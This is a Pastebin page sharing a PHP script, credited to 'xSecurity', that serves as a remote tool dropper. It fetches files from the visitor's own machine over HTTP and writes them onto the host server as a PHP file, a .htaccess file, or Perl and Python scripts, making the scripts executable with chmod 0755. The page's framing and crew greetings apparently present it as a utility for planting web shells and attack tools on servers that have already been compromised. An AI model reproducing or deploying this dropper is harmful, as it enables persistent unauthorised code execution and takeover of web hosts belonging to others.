Advertisement
Ribang

Get Tools From Your AppServ v2

Feb 4th, 2018
606
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.02 KB | None | 0 0
  1. <form method='POST'>
  2. <body text='#FFFFFF' bgcolor='#000000'>
  3. <style>
  4. table {
  5. border : 0pt;
  6. }
  7. </style>
  8. <title># Get Tools From Your AppServ v2 | By xSecurity | #</title>
  9. <p align='center' dir='ltr'><font face='Ubuntu'><b><font size='6'>GeT Tools From
  10. Your AppServ</font><font color='#FF0000' size='2'>v2</font></b></font></p>
  11. <table align='center' border='1' width='25%'>
  12. <tr>
  13. <td width='50%'>
  14. <p align='center' dir='ltr'><font face='Ubuntu' size='2'>Folder Name in Your AppServ</font></td>
  15. <td>
  16. <p align='center' dir='ltr'><font face='Ubuntu' size='2'>Folder Name Will Be Created</font></td>
  17. </tr>
  18. <tr>
  19. <td width='50%'>
  20. <p align='center' dir='ltr'><font size='3' face='Ubuntu'>
  21. <input type='text' name='path' value='tools' /></font></td>
  22. <td>
  23. <p align='center' dir='ltr'><font size='3' face='Ubuntu'>
  24. <input type='text' name='dir' value='xsecurity' size='20' /></font></td>
  25. </tr>
  26. </table>
  27. <p align='center' dir='ltr'><font face='Ubuntu'>Type File Then File Name In
  28. AppServ<br>
  29. <select name='xsec'>
  30. <option>php</option>
  31. <option>htaccess</option>
  32. <option>PERL</option>
  33. <option>Python</option>
  34. </select>
  35. <input type='text' name='tool' value='file.txt' /><font size='2'> <br><br></font>
  36. <input type='submit' value='Get Tool' size='10' /></font></p></form><center>
  37. <?
  38. /*
  39. Title : Get Tools From Your AppServ version 2 : )
  40. Coded By : xSecurity
  41. Skype : b0x-sa
  42. Homepage : www.sec4ever.com - www.is-sec.com
  43. Greets 2 : Mr.Dm4r - No-QRQR - b0x - Lov3rDNS - DamaneDz - r0kin - DeeF - aBo LalH - aBo Ali & All Members : )
  44. */
  45. # POST
  46. $ip = $_SERVER['REMOTE_ADDR'];
  47. $dir = $_POST['dir'];
  48. $path = $_POST['path'];
  49. $tool = $_POST['tool'];
  50. $mkdir = @mkdir($dir);
  51.  
  52. # GET PHP
  53. if($_POST['xsec'] == 'php')
  54. {
  55. $php = @file_get_contents("http://$ip/$path/$tool");
  56. $phps = @fopen("$dir/xsec-php.php" ,'w');
  57. $source = $php;
  58. $write1 = @fwrite($phps,$source);
  59. if($write1)
  60. {
  61. echo "[+] Created Complate Name File : [ $dir/xsec-php.php ]";
  62. } else {
  63. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents ] Maybe Doesn't Work";
  64. }
  65. }
  66. # GET HTACCESS
  67. if($_POST['xsec'] == 'htaccess')
  68. {
  69. $htaccess = @file_get_contents("http://$ip/$path/$tool");
  70. $htacces = @fopen($dir.'/.htaccess','w');
  71. $sourceh = $htaccess;
  72. $write2 = @fwrite($htacces,$sourceh);
  73. if($write2)
  74. {
  75. echo "[+] Created Complate Name File : [ $dir/.htaccess ]";
  76. } else {
  77. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents ] Maybe Doesn't Work";
  78. }
  79. }
  80. # GET PERL
  81. if($_POST['xsec'] == 'PERL')
  82. {
  83. $perl = @file_get_contents("http://$ip/$path/$tool");
  84. $perls = @fopen($dir.'/xsecurity.pl','w');
  85. $sourcep = $perl;
  86. $write3 = @fwrite($perls,$sourcep);
  87. chmod("xsecurity.pl", 0755);
  88. if($write3)
  89. {
  90. echo "[+] Created Complate Name File : [ $dir/xsecurity.pl ] <br> Chmod Complate : )";
  91. } else {
  92. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents + CHMOD ] Maybe Doesn't Work";
  93. }
  94. }
  95. # GET Python
  96. if($_POST['xsec'] == 'Python')
  97. {
  98. $python = @file_get_contents("http://$ip/$path/$tool");
  99. $pythons = @fopen($dir.'/xsecurity.py','w');
  100. $sourcepy = $python;
  101. $write4 = @fwrite($pythons,$sourcepy);
  102. chmod('xsecurity.py', 0755);
  103. if($write4)
  104. {
  105. echo "[+] Created Complate Name File : [ $dir/xsecurity.py ] <br> Chmod Complate : )";
  106. } else {
  107. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents + CHMOD ] Maybe Doesn't Work";
  108. }
  109. }
  110. ?>
  111. <p align='center' dir='ltr'><font size='2' face='Ubuntu'>Coded By :
  112. <font color='#3366CC'>xSecurity</font> - Skype : <font color='#3366CC'>b0x-sa</font><br>
  113. <font color='#3366CC'>&nbsp;www.sec4ever.com</font> - <font color='#3366CC'>
  114. www.is-sec.com </font><br>
  115. <font color='#3366CC'>4U </font>: Mr.Dm4r - No-QRQR - b0x - Lov3rDNS - DamaneDz
  116. - r0kin - DeeF - aBo LalH - aBo Ali &amp; All Members : )</font></p>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement